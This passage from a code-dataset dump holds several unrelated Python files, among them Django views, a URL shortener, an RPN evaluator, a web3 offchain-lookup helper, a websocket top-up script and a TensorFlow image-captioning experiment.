request)\n","sub_path":"src/encoded/types/access_key.py","file_name":"access_key.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"282750215","text":"from django.shortcuts import render, redirect\nfrom . import models\nfrom django.contrib import messages\nimport bcrypt\n\ndef index(request):\n return render(request, \"exam_app/index.html\")\n\ndef registration(request):\n result = models.User.objects.registration(request.POST)\n if result[\"status\"] == True:\n request.session[\"user_id\"] = result[\"userInfo\"].id\n request.session[\"first_name\"] = result[\"userInfo\"].first_name\n return redirect(\"/success\")\n else:\n for error in result[\"errors\"]:\n messages.warning(request, error)\n return redirect(\"/\")\n\ndef login(request):\n result=models.User.objects.login(request.POST)\n if result[\"status\"] == True:\n request.session[\"user_id\"] = result[\"userInfo\"].id\n request.session[\"first_name\"] = result[\"userInfo\"].first_name\n return redirect(\"/success\")\n else:\n for error in result[\"errors\"]:\n messages.warning(request, error)\n return redirect(\"/\")\n\ndef success(request):\n if not 'user_id' in request.session:\n return redirect(\"/\")\n\n user_wishlist = models.Item.objects.all().filter(user__id = request.session[\"user_id\"])\n items = models.Item.objects.all().exclude(user__id = request.session[\"user_id\"]).exclude(users_wishlist__id = request.session[\"user_id\"])\n added_to_wishlist = models.User.objects.all().filter(id = request.session[\"user_id\"]).values(\"wishlist__name\", \"wishlist__id\", \"wishlist__user__first_name\")\n\n # for item in added_to_wishlist:\n # print item[\"wishlist__name\"], item[\"wishlist__id\"], item[\"wishlist__user__first_name\"]\n\n\n\n # for user in users:\n # print user.first_name, user.items.name\n # user = models.User.objects.all().filter(id = request.session[\"user_id\"])[0]\n #\n # friends = user.friend.all()\n # friended_by_other = models.User.objects.all().filter(friend__id = request.session[\"user_id\"])\n #Give me the friend instance who is linked to the id of the user in session.\n\n\n context={\n \"items\" : items,\n \"user_wishlist\" : user_wishlist,\n \"added_to_wishlist\" : added_to_wishlist\n\n }\n return render(request, \"exam_app/success.html\", context)\n\ndef add_to_wishlist(request, id):\n models.User.objects.add_to_wishlist(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef remove_wishlist(request, id):\n models.User.objects.remove_wishlist(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef delete_item(request, id):\n models.User.objects.delete_item(request.POST, request.session, id)\n return redirect(\"/success\")\n\ndef view_item(request, id):\n item = models.Item.objects.all().filter(id = id)[0]\n\n other_users = models.User.objects.all().filter(wishlist__id = id)\n\n\n context={\n \"item\" : item,\n \"other_users\" : other_users\n }\n\n return render(request, \"exam_app/view_item.html\", context)\n\ndef add_item(request):\n return render(request, \"exam_app/create.html\")\n\ndef add_item_process(request):\n models.User.objects.add_item_process(request.POST, request.session)\n return redirect(\"/success\")\n\ndef logout(request):\n del request.session[\"user_id\"]\n del request.session[\"first_name\"]\n return redirect 
(\"/\")\n","sub_path":"apps/exam_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"631208448","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect\nfrom django.template import Context, loader\nfrom shorties.models import Record\n\ndef index(request):\n if request.method == 'GET':\n return render(request, 'shorties/index.html')\n elif request.method == 'POST':\n rec = Record(url=request.POST['url'])\n rec.save()\n t = loader.get_template('shorties/trim.html')\n c = Context({'enc': rec.to_base64(), 'ref': request.META.get('HTTP_REFERER', '')}) # the Referer header may be absent\n return HttpResponse(t.render(c))\ndef trimed(request):\n base64_id = request.META['PATH_INFO'].split('/')[-1]\n rec_id = Record.id_from_base64(str(base64_id))\n url = Record.objects.get(pk=rec_id).url\n protocol = 'http://' if len(url.split('://')) == 1 else ''\n return HttpResponsePermanentRedirect(protocol + url)\n","sub_path":"shorties/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"156943630","text":"#!/usr/local/bin/python3.6\n#-*-encoding:utf-8-*-\n# Title:\n# Author: luohu\n# Date: 2018-09\n# Purpose:\ndef getopts(argv):\n\topts = {}\n\twhile argv:\n\t\tif argv[0][0] == \"-\":\n\t\t\topts[argv[0]] = argv[1]\n\t\t\targv = argv[2:]\n\t\t\t#print ('if:',argv)\n\t\telse:\n\t\t\targv = argv[1:]\n\t\t\t#print('else:',argv)\n\treturn opts\n\nif __name__=='__main__':\n\tfrom sys import argv\n\tmyargs = getopts(argv)\n\t#if '-i' in myargs:\n\t\t#print(myargs['-i'])\n\tprint(myargs)\n","sub_path":"python_program/02.System/testargv2.py","file_name":"testargv2.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"169403288","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n @staticmethod\n def evalRPN(tokens):\n \"\"\"\n :type tokens: List[str]\n :rtype: int\n \"\"\"\n stack = []\n for token in tokens:\n if token not in ['+', '-', '*', '/']:\n # push the whole token: operands may be multi-digit\n stack.append(token)\n else:\n # the operand pushed last is the right-hand side\n n2, n1 = stack.pop(), stack.pop()\n # trailing '.' forces float arithmetic; int() truncates toward zero\n t = repr(int(eval(n1 + token + n2 + '.')))\n stack.append(t)\n\n return int(stack[0])\n\n\ndef test():\n tokens = [\"2\", \"1\", \"+\", \"3\", \"*\"]\n print(Solution.evalRPN(tokens))\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"EvaReverseNotation.py","file_name":"EvaReverseNotation.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"514135272","text":"from typing import (\n Any,\n Dict,\n)\n\nfrom eth_abi import (\n abi,\n)\nfrom eth_typing import (\n URI,\n)\n\nfrom web3._utils.request import (\n async_get_json_from_client_response,\n async_get_response_from_get_request,\n async_get_response_from_post_request,\n)\nfrom web3._utils.type_conversion import (\n to_bytes_if_hex,\n to_hex_if_bytes,\n)\nfrom web3.exceptions import (\n MultipleFailedRequests,\n Web3ValidationError,\n)\nfrom web3.types import (\n TxParams,\n)\n\n\nasync def async_handle_offchain_lookup(\n offchain_lookup_payload: Dict[str, Any],\n transaction: TxParams,\n) -> bytes:\n formatted_sender = to_hex_if_bytes(offchain_lookup_payload[\"sender\"]).lower()\n formatted_data = to_hex_if_bytes(offchain_lookup_payload[\"callData\"]).lower()\n\n if formatted_sender != 
to_hex_if_bytes(transaction[\"to\"]).lower():\n raise Web3ValidationError(\n \"Cannot handle OffchainLookup raised inside nested call. Returned \"\n \"`sender` value does not equal `to` address in transaction.\"\n )\n\n for url in offchain_lookup_payload[\"urls\"]:\n formatted_url = URI(\n str(url)\n .replace(\"{sender}\", str(formatted_sender))\n .replace(\"{data}\", str(formatted_data))\n )\n\n try:\n if \"{data}\" in url and \"{sender}\" in url:\n response = await async_get_response_from_get_request(formatted_url)\n elif \"{sender}\" in url:\n response = await async_get_response_from_post_request(\n formatted_url,\n data={\"data\": formatted_data, \"sender\": formatted_sender},\n )\n else:\n raise Web3ValidationError(\"url not formatted properly.\")\n except Exception:\n continue # try next url if timeout or issues making the request\n\n if (\n 400 <= response.status <= 499\n ): # if request returns 400 error, raise exception\n response.raise_for_status()\n if not 200 <= response.status <= 299: # if not 400 error, try next url\n continue\n\n result = await async_get_json_from_client_response(response)\n\n if \"data\" not in result.keys():\n raise Web3ValidationError(\n \"Improperly formatted response for offchain lookup HTTP request\"\n \" - missing 'data' field.\"\n )\n\n encoded_data_with_function_selector = b\"\".join(\n [\n # 4-byte callback function selector\n to_bytes_if_hex(offchain_lookup_payload[\"callbackFunction\"]),\n # encode the `data` from the result and the `extraData` as bytes\n abi.encode(\n [\"bytes\", \"bytes\"],\n [\n to_bytes_if_hex(result[\"data\"]),\n to_bytes_if_hex(offchain_lookup_payload[\"extraData\"]),\n ],\n ),\n ]\n )\n\n return encoded_data_with_function_selector\n raise MultipleFailedRequests(\"Offchain lookup failed for supplied urls.\")\n","sub_path":"web3/utils/async_exception_handling.py","file_name":"async_exception_handling.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314166226","text":"from websocket import create_connection as cc\nimport os, signal, time, sys, json\nfrom datetime import datetime\nimport psycopg2\nfrom configparser import ConfigParser\nfrom database_config import db_config\nimport script_database_methods as sdm\n\ndef keyboardInterruptHandler(signal, frame):\n print('\\nCtrl+c pressed, exiting...')\n # no GPIO module is imported or used in this script, so there is nothing to clean up here\n exit(0)\n\n# global definitions\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\nconfig = ConfigParser()\nconfig.read(BASE_DIR + '/settings.ini')\nTIMEOUT_TIME = int(config['TIMEOUT']['timeout_seconds'])\nws_servida_timeout = TIMEOUT_TIME + 30\ndb_params = db_config()\n\n\ndef main(conn):\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n mensaje_accion = ws.recv()\n ws.close()\n mensaje = json.loads(mensaje_accion)[\"message\"]\n tipo_mensaje = mensaje[\"tipo_mensaje\"]\n if tipo_mensaje == \"control\":\n accion = json.loads(mensaje_accion)[\"message\"][\"mensaje\"].split(',')\n if accion[0] == \"carga_remota\":\n uuid_carga = accion[1] # receives the uuid (the incoming message is \"mensaje\" : \"carga_remota,uuid\")\n tarjeta = sdm.lectura_tarjeta(conn, (uuid_carga,))\n if (tarjeta): # card already exists in the DB\n mensaje = '{\"type\": \"chat_message\", \"message\": {\"tipo_mensaje\": \"comunicacion\", \"mensaje\": {\"uuid\": \"%s\", \"nombre\": \"%s\", 
\"saldo\": \"%d\", \"fecha\": \"%s\"}}}' % (tarjeta[1], tarjeta[2], tarjeta[3], tarjeta[4])\n else: # new card\n mensaje = '{\"type\": \"chat_message\", \"message\": {\"tipo_mensaje\": \"comunicacion\", \"mensaje\": {\"uuid\": \"%s\", \"nombre\": \"%s\", \"saldo\": \"%d\", \"fecha\": \"%s\"}}}' % (uuid_carga, \"Nueva Tarjeta\", 0, datetime.today())\n # Open, send and close. This should really be a single helper function.\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n ws.send(mensaje)\n ws.close()\n # Open again and wait to receive\n ws = cc(\"ws://192.168.0.69:8001/dispenser/carga_remota/\", timeout=ws_servida_timeout)\n mensaje_accion_carga = ws.recv()\n print(mensaje_accion_carga)\n mensaje_carga = json.loads(mensaje_accion_carga)[\"message\"]\n tipo_mensaje_carga = mensaje_carga[\"tipo_mensaje\"]\n if tipo_mensaje_carga == \"control\":\n print(\"received top-up message from the web\")\n accion_carga = json.loads(mensaje_accion_carga)[\"message\"][\"mensaje\"].split(',')\n if accion_carga[0] == \"carga\":\n nombre = accion_carga[3] # packet format: {carga, $monto, nombre, $nombre}\n monto = float(accion_carga[1])\n fecha_carga = datetime.now().strftime(\"%d/%m/%Y - %H:%M\")\n tarjeta_actual = (uuid_carga, nombre, monto, datetime.now())\n print(tarjeta_actual)\n sdm.registro_tarjeta(conn, tarjeta_actual)\n ws.close() # and close\n\n\n\ndef wait_for_system_online():\n online = False\n while True:\n if (not online):\n try:\n ws = cc(\"ws://192.168.0.69:8001/dispenser/acciones/\", timeout=5)\n online = True\n ws.close()\n except Exception:\n time.sleep(5)\n else:\n break\n\n\nif __name__ == '__main__':\n wait_for_system_online()\n conn = sdm.create_connection(**db_params)\n while True:\n main(conn)\n","sub_path":"scripts/carga_remota.py","file_name":"carga_remota.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"454750203","text":"from __future__ import absolute_import, division, unicode_literals, print_function\nimport pandas as pd\nfrom collections import defaultdict\nimport tensorflow as tf\nimport json\nimport numpy as np\nimport sys, os, shutil\nimport random\nimport timeit\nimport collections\nimport heapq\nimport io\n\n############ params ####################################################\nmax_epochs = 100\nnum_runs = 3\nminibatch_size = 50\nresults_data_dir = '/media/compute/vol/dsg/lilian/testrun_after_refactoring/results'\nmin_token_freq = 3\nlayer_size = 512\nmethod = 'inject' # 'merge'\ndataset = 'refcoco_refrnn_compositional'\n\n##################################################################################################################################\n\ndef generate_sequence_beamsearch(predictions_function, beam_width=3, clip_len=20):\n prev_beam = Beam(beam_width)\n prev_beam.add(np.array(1.0, 'float64'), False, [ edge_index ])\n while True:\n curr_beam = Beam(beam_width)\n\n #Add complete sentences that do not yet have the best probability to the current beam, the rest prepare to add more words to them.\n prefix_batch = list()\n prob_batch = list()\n for (prefix_prob, complete, prefix) in prev_beam:\n if complete == True:\n curr_beam.add(prefix_prob, True, prefix)\n else:\n prefix_batch.append(prefix)\n prob_batch.append(prefix_prob)\n\n #Get probability of each possible next word for each incomplete prefix.\n indexes_distributions = predictions_function(prefix_batch)\n\n #Add next words\n for (prefix_prob, prefix, indexes_distribution) in 
zip(prob_batch, prefix_batch, indexes_distributions):\n for (next_index, next_prob) in enumerate(indexes_distribution):\n if next_index == unknown_index: #skip unknown tokens\n pass\n elif next_index == edge_index: #if next word is the end token then mark prefix as complete and leave out the end token\n curr_beam.add(prefix_prob*next_prob, True, prefix)\n else: #if next word is a non-end token then mark prefix as incomplete\n curr_beam.add(prefix_prob*next_prob, False, prefix+[next_index])\n\n (best_prob, best_complete, best_prefix) = max(curr_beam)\n if best_complete == True or len(best_prefix)-1 == clip_len: #if the length of the most probable prefix exceeds the clip length (ignoring the start token) then return it as is\n return ' '.join(index_to_token[index] for index in best_prefix[1:]) #return best sentence without the start token\n\n prev_beam = curr_beam\n\n##################################################################################################################################\nclass Beam(object):\n#For comparison of prefixes, the tuple (prefix_probability, complete_sentence) is used.\n#This is so that if two prefixes have equal probabilities then a complete sentence is preferred over an incomplete one since (0.5, False) < (0.5, True)\n\n def __init__(self, beam_width):\n self.heap = list()\n self.beam_width = beam_width\n\n def add(self, prob, complete, prefix):\n heapq.heappush(self.heap, (prob, complete, prefix))\n if len(self.heap) > self.beam_width:\n heapq.heappop(self.heap)\n\n def __iter__(self):\n return iter(self.heap)\n\n##################################################################################################################################\n\nif __name__ == '__main__':\n\n ############ load and prepare image features ###########################\n\n # Image Features --> numpy npz file includes one key/array, arr_0\n extracted_features = np.load(\"../data/refcoco/mscoco_vgg19_refcoco.npz\")['arr_0']\n #print \"type\", type (extracted_features)\n #print \"extracted_features.shape \",extracted_features.shape # (49865, 4106)\n #print \"vgg_mat[1][0] \", extracted_features[1][0] # 1.0\n #extracted_features = extracted_features[:,3:]\n #print \"extracted_features.shape \",extracted_features.shape # (49865, 4103)\n #print \"vgg_mat[1][0] \", extracted_features[1][0] # 0.0\n\n test_list =[]\n test_count = 0\n\n img_counter = 0\n sentence_counter = 0\n selected_img_features = [] #alias img_mat\n\n ########### load and prepare referring expressions dataset ##############\n refcoco_data = pd.read_json(\"../data/refcoco/refcoco_refdf.json.gz\", orient=\"split\", compression=\"gzip\")\n with open(\"../data/refcoco/refcoco_splits.json\") as f:\n splits = json.load(f)\n splitmap = {'val':'val','train':'train','testA':'test','testB':'test'}\n # for every group in split --> for every entry --> make entry in new dict\n # file2split just translates testA and testB to \"test\"?\n new_split_dict = {val:splitmap[key] for key in splits for val in splits[key]}\n\n\n # dict of objectids and ref exps\n obj2phrases = defaultdict(list)\n # dict of objectids and split (train,test or val)\n obj2split = {}\n split2obj = {'train':[],'test':[]}\n\n # iterate over json \"entries\"\n for index, row in refcoco_data.iterrows():\n # id is tuple of image and region id\n objectid = (row['image_id'], row['region_id'])\n obj2phrases[objectid].append(row['refexp'].split())\n obj2split[objectid] = new_split_dict[row['image_id']]\n\n #print \"Objects\",len(obj2phrases)\n ############ match visual 
data with referring expressions ###############\n ############### & set up raw data with splits ###########################\n\n raw_dataset = {\n 'train': { 'filenames': list(), 'images': list(), 'captions': list() },\n 'val': { 'filenames': list(), 'images': list(), 'captions': list() },\n 'test': { 'filenames': list(), 'images': list(), 'captions': list() },\n }\n\n # tqdm visualizes progress in the terminal :)\n for obj2phrases_item in obj2phrases: #tqdm(obj2phrases):\n\n # [:,1] means: all indices of x along the first axis, but only index 1 along the second --> this list comprehension filters out features for one image\n features_for_imageId = extracted_features[extracted_features[:,1] == obj2phrases_item[0]] #obj2phrases_item[0] is image id\n # this filters out features for the correct region\n features_for_objectId = features_for_imageId[features_for_imageId[:,2] == obj2phrases_item[1]] #obj2phrases_item[1] is region id\n\n if len(features_for_objectId) > 0:\n image = np.array(features_for_objectId[0])[3:]\n test_list.append(np.array(features_for_objectId[0])[3:])\n test_count += 1\n\n split = obj2split[obj2phrases_item]\n filename = \"_\".join([str(obj2phrases_item[0]),str(obj2phrases_item[1])])\n caption_group = []\n for ref in obj2phrases[obj2phrases_item]:\n caption_group.append(ref)\n\n image = image / np.linalg.norm(image)\n\n raw_dataset[split]['filenames'].append(filename)\n raw_dataset[split]['images'].append(image)\n raw_dataset[split]['captions'].append(caption_group)\n\n print('raw data set',len(raw_dataset['train']['captions'])) #42279\n\n print(len(raw_dataset['train']['images']) + len(raw_dataset['val']['images']) + \\\n len(raw_dataset['test']['images'])) #should be 49865\n\n print(raw_dataset['train']['captions'][0]) # output : [[u'hidden', u'chocolate', u'donut'], [u'space', u'right', u'above', u'game']]\n print(raw_dataset['train']['captions'][111]) # output : [[u'groom'], [u'groom'], [u'man']]\n\n # to compare with original scripts: here, the order is like\n # in im_mat from prepare_refcoco.py.\n print(\"count\", test_count) # 49865\n test_list = np.array(test_list)\n print(test_list.shape)\n print(\"test:: \", test_list[1][0]) # 0.0729042887688 --> like in original script (random number chosen)\n\n\n ################################################################\n # for min_token_freq in [ 3, 4, 5 ]:\n all_tokens = (token for caption_group in raw_dataset['train']['captions'] for caption in caption_group for token in\n caption)\n token_freqs = collections.Counter(all_tokens)\n vocab = sorted(token_freqs.keys(), key=lambda token: (-token_freqs[token], token))\n # discard words with very low frequency\n while token_freqs[vocab[-1]] < min_token_freq:\n vocab.pop()\n\n vocab_size = len(vocab) + 2 # + edge and unknown tokens\n print('vocab:', vocab_size)\n\n # \"word embedding\"\n token_to_index = {token: i + 2 for (i, token) in enumerate(vocab)}\n index_to_token = {i + 2: token for (i, token) in enumerate(vocab)}\n edge_index = 0\n unknown_index = 1\n\n\n ################################################################\n\n def parse(data):\n indexes = list()\n lens = list()\n images = list()\n for (caption_group, img) in zip(data['captions'], data['images']):\n for caption in caption_group: # := default is unknown\n indexes_ = [token_to_index.get(token, unknown_index) for token in caption]\n indexes.append(indexes_)\n lens.append(len(indexes_) + 1) # add 1 due to edge token\n images.append(img)\n\n maxlen = max(lens)\n\n in_mat = np.zeros((len(indexes), maxlen), 
np.int32)\n out_mat = np.zeros((len(indexes), maxlen), np.int32)\n for (row, indexes_) in enumerate(indexes):\n in_mat[row, :len(indexes_) + 1] = [edge_index] + indexes_\n out_mat[row, :len(indexes_) + 1] = indexes_ + [edge_index]\n return (in_mat, out_mat, np.array(lens, np.int32), np.array(images))\n\n\n (train_captions_in, train_captions_out, train_captions_len, train_images) = parse(raw_dataset['train'])\n (val_captions_in, val_captions_out, val_captions_len, val_images) = parse(raw_dataset['val'])\n (test_captions_in, test_captions_out, test_captions_len, test_images) = parse(raw_dataset['test'])\n print(\"Train captions\", np.shape(train_captions_in))\n ################################################################\n print('Training...')\n\n # for layer_size in [ 128, 256, 512 ]:\n # for method in [ 'merge', 'inject' ]:\n for run in range(1, num_runs + 1):\n model_name = '_'.join([str(x) for x in [method, dataset, min_token_freq, layer_size, run]])\n if os.path.isdir(results_data_dir + '/' + model_name):\n os.system(\"rm -r \" + results_data_dir + '/' + model_name)\n os.makedirs(results_data_dir + '/' + model_name)\n\n print()\n print('-' * 100)\n print(dataset, min_token_freq, layer_size, method, run)\n print()\n\n tf.reset_default_graph()\n\n # Sequence of token indexes generated thus far included start token (or full correct sequence during training).\n seq_in = tf.placeholder(tf.int32, shape=[None, None], name='seq_in') # [seq, token index]\n # Length of sequence in seq_in.\n seq_len = tf.placeholder(tf.int32, shape=[None], name='seq_len') # [seq len]\n # Images\n image = tf.placeholder(tf.float32, shape=[None, 4103], name='image') # [seq, image feature]\n # Correct sequence to generate during training without start token but with end token\n seq_target = tf.placeholder(tf.int32, shape=[None, None], name='seq_target') # [seq, token index]\n\n # Number of sequences to process at once.\n batch_size = tf.shape(seq_in)[0]\n # Number of tokens in generated sequence.\n num_steps = tf.shape(seq_in)[1]\n\n with tf.variable_scope('image'):\n # Project image vector into a smaller vector.\n\n W = tf.get_variable('W', [4103, layer_size], tf.float32, tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('b', [layer_size], tf.float32, tf.zeros_initializer())\n\n post_image = tf.matmul(image, W) + b\n\n with tf.variable_scope('prefix_encoder'):\n # Encode each generated sequence prefix into a vector.\n\n # Embedding matrix for token vocabulary. 
-> xavier: weight initialization!\n embeddings = tf.get_variable('embeddings', [vocab_size, layer_size], tf.float32,\n tf.contrib.layers.xavier_initializer()) # [vocabulary token, token feature]\n\n # 3tensor of tokens in sequences replaced with their corresponding embedding.\n # look up ids in seq_in in full vocab\n embedded = tf.nn.embedding_lookup(embeddings, seq_in) # [seq, token, token feature]\n\n print (\"embedded shape: \", np.shape(embedded))\n # t = tf.expand_dims(post_image, 1)\n if method == 'inject':\n rnn_input = tf.concat([embedded, tf.tile(tf.expand_dims(post_image, 1), [1, num_steps, 1])], axis=2)\n else:\n rnn_input = embedded\n\n # Use an LSTM to encode the generated prefix.\n init_state = tf.contrib.rnn.LSTMStateTuple(c=tf.zeros([batch_size, layer_size]),\n h=tf.zeros([batch_size, layer_size]))\n cell = tf.contrib.rnn.BasicLSTMCell(layer_size)\n (prefix_vectors, _) = tf.nn.dynamic_rnn(cell, rnn_input, sequence_length=seq_len,\n initial_state=init_state) # [seq, prefix position, prefix feature]\n\n # Mask of which positions in the matrix of sequences are actual labels as opposed to padding.\n token_mask = tf.cast(tf.sequence_mask(seq_len, num_steps), tf.float32) # [seq, token flag]\n\n with tf.variable_scope('softmax'):\n # Output a probability distribution over the token vocabulary (including the end token)\n\n if method == 'merge':\n\n softmax_input = tf.concat([prefix_vectors, tf.tile(tf.expand_dims(post_image, 1), [1, num_steps, 1])],\n axis=2)\n softmax_input_size = layer_size + layer_size # state + image\n else:\n softmax_input = prefix_vectors\n softmax_input_size = layer_size\n\n W = tf.get_variable('W', [softmax_input_size, vocab_size], tf.float32,\n tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('b', [vocab_size], tf.float32, tf.zeros_initializer())\n logits = tf.reshape(tf.matmul(tf.reshape(softmax_input, [-1, softmax_input_size]), W) + b,\n [batch_size, num_steps, vocab_size])\n predictions = tf.nn.softmax(logits) # [seq, prefix position, token probability]\n last_prediction = predictions[:, -1]\n\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=seq_target, logits=logits) * token_mask\n total_loss = tf.reduce_sum(losses)\n train_step = tf.train.AdamOptimizer().minimize(total_loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n num_params = 0\n for v in sess.graph.get_collection('trainable_variables'):\n num_params += np.prod(v.get_shape()).value\n\n print('epoch', 'val loss', 'duration', sep='\\t')\n run_start = start = timeit.default_timer()\n\n # validation_loss = 0\n # for i in range(len(test_images)//minibatch_size):\n # minibatch_validation_loss = sess.run(total_loss, feed_dict={\n # seq_in: val_captions_in [i*minibatch_size:(i+1)*minibatch_size],\n # seq_len: val_captions_len[i*minibatch_size:(i+1)*minibatch_size],\n # seq_target: val_captions_out[i*minibatch_size:(i+1)*minibatch_size],\n # image: test_images[i*minibatch_size:(i+1)*minibatch_size]\n # })\n # validation_loss += minibatch_validation_loss\n # print(0, round(validation_loss, 3), round(timeit.default_timer() - start), sep='\\t')\n last_validation_loss = 1000000\n\n trainingset_indexes = list(range(len(train_images)))\n for epoch in range(1, max_epochs + 1):\n random.shuffle(trainingset_indexes)\n\n start = timeit.default_timer()\n for i in range(len(trainingset_indexes) // minibatch_size):\n minibatch_indexes = trainingset_indexes[i * minibatch_size:(i + 1) * minibatch_size]\n sess.run(train_step, 
feed_dict={\n seq_in: train_captions_in[minibatch_indexes],\n seq_len: train_captions_len[minibatch_indexes],\n seq_target: train_captions_out[minibatch_indexes],\n image: train_images[minibatch_indexes]\n })\n\n validation_loss = 0\n for i in range(len(test_images) // minibatch_size):\n minibatch_validation_loss = sess.run(total_loss, feed_dict={\n seq_in: val_captions_in[i * minibatch_size:(i + 1) * minibatch_size],\n seq_len: val_captions_len[i * minibatch_size:(i + 1) * minibatch_size],\n seq_target: val_captions_out[i * minibatch_size:(i + 1) * minibatch_size],\n image: val_images[i * minibatch_size:(i + 1) * minibatch_size] # test images\n })\n validation_loss += minibatch_validation_loss\n print(epoch, round(validation_loss, 3), round(timeit.default_timer() - start), sep='\\t')\n if validation_loss > last_validation_loss:\n break\n last_validation_loss = validation_loss\n print(\"save model\", results_data_dir + '/' + model_name + '/model')\n saver.save(sess, results_data_dir + '/' + model_name + '/model')\n\n saver.restore(sess, tf.train.latest_checkpoint(results_data_dir + '/' + model_name))\n\n print()\n print('evaluating...')\n print()\n\n captions = list()\n for (i, image_input) in enumerate(raw_dataset['test']['images']):\n caption = generate_sequence_beamsearch(lambda prefixes: sess.run(last_prediction, feed_dict={\n seq_in: prefixes,\n seq_len: [len(p) for p in prefixes],\n image: image_input.reshape([1, -1]).repeat(len(prefixes), axis=0)\n }))\n captions.append(caption)\n\n vocab_used = len({word for caption in captions for word in caption.split(' ')})\n\n with open(results_data_dir + '/' + model_name + '/generated_captions.json', 'w') as f:\n print(str(json.dumps([\n {\n 'image_id': image_id,\n 'caption': caption\n }\n for (image_id, caption) in enumerate(captions)\n ])), file=f)\n\n print()\n print('Duration:', round(timeit.default_timer() - run_start), 's')\n print()\n\n######### new\n oids = list()\n captions_new = list()\n for (i, image_input) in enumerate(raw_dataset['test']['images']):\n caption = generate_sequence_beamsearch(lambda prefixes: sess.run(last_prediction, feed_dict={\n seq_in: prefixes,\n seq_len: [len(p) for p in prefixes],\n image: image_input.reshape([1, -1]).repeat(len(prefixes), axis=0)\n }))\n captions_new.append([caption])\n\n for (i, item) in enumerate(raw_dataset['test']['filenames']):\n oids.append(item.split(\"_\")[1])\n\n dict4eval = defaultdict(list)\n for (idx, pair) in enumerate(zip(oids, captions_new)):\n dict4eval[pair[0]] = pair[1]\n with open(results_data_dir + '/' + '4evalrefactoredexp_' + model_name + '.json', 'w') as f:\n json.dump(dict4eval, f)\n","sub_path":"src/refactored_experiment.py","file_name":"refactored_experiment.py","file_ext":"py","file_size_in_byte":20056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"33715699","text":"\n\nfrom xai.brain.wordbase.nouns._hat import _HAT\n\n# class header\nclass _HATTED(_HAT):\n\tdef __init__(self):\n\t\t_HAT.__init__(self)\n\t\tself.name = \"HATTED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hatted.py","file_name":"_hatted.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"452330517","text":"\"\"\"\nInsertion sort is a simple sorting algorithm with O(n^2) time complexity.\nIt always maintains a sorted sublist in the lower position of the list. 
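For example, sorting [5, 2, 4]: the pass for 2 shifts 5 right and inserts 2 in front ([2, 5, 4]); the pass for 4 shifts 5 right and inserts 4 in the middle ([2, 4, 5]).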
\nEach new item is then \"inserted\" back into the previous sublist such that\nthe sorted sublist is one item larger.\n\"\"\"\n\n\nfrom typing import List\n\n\ndef number_insertion_sort(data_to_sort: List) -> None:\n\n for index in range(1, len(data_to_sort)):\n key = data_to_sort[index] # 4\n sorted_position = index-1 # 0\n\n while sorted_position >= 0 and key < data_to_sort[sorted_position]:\n # Shift the larger value one position to the right\n data_to_sort[sorted_position + 1] = data_to_sort[sorted_position]\n sorted_position -= 1\n\n data_to_sort[sorted_position + 1] = key\n\n# 1st random number sorting -> 6.154s\n# 2nd random number sorting -> 6.296s\n# 3rd random number sorting -> 6.214s\n# 4th random number sorting -> 6.847s\n# 5th random number sorting -> 5.578s\n","sub_path":"insertion_sort/basic_insertion_sort.py","file_name":"basic_insertion_sort.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26519168","text":"from datetime import datetime, timedelta\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom threading import Thread\nfrom .exceptions import VaultConfigurationError, VaultCredentialProviderError\nimport asyncio\nimport distutils.util\nimport dateutil.parser\nimport portalocker\nimport json\nimport logging\nimport os.path\nimport os\nimport pytz\nimport hvac\nimport threading\nimport stat\nimport random\n\nlogger = logging.getLogger(__name__)\n\n# Constants\nAUTH_TYPE_APPID = 'app-id'\nAUTH_TYPE_APPROLE = 'approle'\nAUTH_TYPE_AWS_IAM = 'aws'\nAUTH_TYPE_KUBERNETES = 'kubernetes'\nAUTH_TYPE_SSL = 'ssl'\nAUTH_TYPE_TOKEN = 'token'\nTOKEN_REFRESH_SECONDS = (60 * 10)\nTOKEN_RENEW_INTERVAL = (60 * 5)\n\n# Basic Vault configuration\nVAULT_URL = os.environ.get('VAULT_URL')\nVAULT_CACERT = os.environ.get('VAULT_CACERT')\nVAULT_SSL_VERIFY = not bool(distutils.util.strtobool(os.environ.get('VAULT_SKIP_VERIFY', 